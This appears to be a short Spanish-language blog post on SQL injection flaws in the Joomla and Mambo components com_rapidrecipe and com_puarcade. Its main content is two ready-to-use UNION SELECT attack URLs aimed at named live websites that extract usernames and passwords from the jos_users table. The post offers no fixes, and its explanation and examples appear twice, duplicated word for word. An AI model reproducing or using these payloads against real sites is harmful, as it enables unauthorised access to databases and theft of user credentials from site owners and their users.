Gran cantidad de sitios aun corren en internet con esta vulnerabilidad, la cual consiste en inyectar una consulta SQL diseñada especialmente para obtener datos de la BD de Joomla!
Veamos dos ejemplos:
URL:
http://www.cleator.co.za/index.php?option=com_rapidrecipe&page=viewrecipe&recipe_id=-1%20UNION%20SELECT%20user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user()%20FROM%20jos_users--
URL:
http://www.zohbetci.com/index.php?option=com_puarcade&Itemid=92&fid=-1%20union%20select%20concat(username,0x3a,password)%20from%20jos_users--
Breve explicación:
Los componentes de Joomla y Mambo 'com_beamospetition', 'com_rapidrecipe', 'com_puarcade', etc... es un objeto de la vulnerabilidad SQLi (SQL inyection) porque falla en las validaciones de las consultas.
Explotando este error puede permitir a un atacante comprometer la aplicacion web, accesar o modificar datos o explotar vulnerabilidades que permanezcan latentes en la base de datos.
Veamos dos ejemplos:
URL:http://www.cleator.co.za/index.php?option=com_rapidrecipe&page=viewrecipe&recipe_id=-1%20UNION%20SELECT%20user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user()%20FROM%20jos_users--
URL:
http://www.zohbetci.com/index.php?option=com_puarcade&Itemid=92&fid=-1%20union%20select%20concat(username,0x3a,password)%20from%20jos_users--
Breve explicación:
Los componentes de Joomla y Mambo 'com_beamospetition', 'com_rapidrecipe', 'com_puarcade', etc... es un objeto de la vulnerabilidad SQLi (SQL inyection) porque falla en las validaciones de las consultas.
Explotando este error puede permitir a un atacante comprometer la aplicacion web, accesar o modificar datos o explotar vulnerabilidades que permanezcan latentes en la base de datos.
No hay comentarios.:
Publicar un comentario
Déjanos tu comentario, nos permitirá mejorar.
¿Qué opinas de este tema?
¿Tienes alguna duda o sugerencia?
¿Te parece adecuado y completo este tema?
¿Falta información? ¿Cual?